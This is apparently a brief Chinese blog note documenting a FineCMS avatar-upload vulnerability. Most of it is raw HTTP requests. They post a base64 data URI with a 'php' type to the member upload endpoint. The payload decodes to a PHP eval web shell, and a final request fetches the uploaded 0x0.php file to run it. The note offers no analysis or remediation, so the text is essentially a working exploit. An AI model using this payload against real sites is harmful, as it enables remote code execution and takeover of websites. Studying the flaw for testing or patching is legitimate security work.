【笔记】FineCMS文件上传漏洞

发表于 更新于 阅读次数:

前言

FineCMS文件上传漏洞

正文

  • 网站首页->会员中心->上传头像->上传

  • 上传包含恶意代码的文件

php:上传后的文件后缀名
PD9waHAgZXZhbCgkX1JFUVVFU1RbeF0pOz8+:Base64编码后的恶意代码

request
1
2
3
4
POST http://127.0.0.1:80/index.php?s=member&c=account&m=upload&iajax=1
Content-Type: application/x-www-form-urlencoded

tx=data:image/php;base64,PD9waHAgZXZhbCgkX1JFUVVFU1RbeF0pOz8+
request
1
2
3
4
POST http://127.0.0.1:80/index.php?s=member&c=account&m=upload&iajax=1
Content-Type: application/x-www-form-urlencoded

tx=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgZXZhbCgkX1JFUVVFU1RbeF0pOz8+
  • 访问/uploadfile/member/<num>/0x0.php<num>是会员编号)文件即可执行恶意代码
request
1
GET http://127.0.0.1:80/uploadfile/member/<num>/0x0.php

完成

参考文献

哔哩哔哩——xiaodisec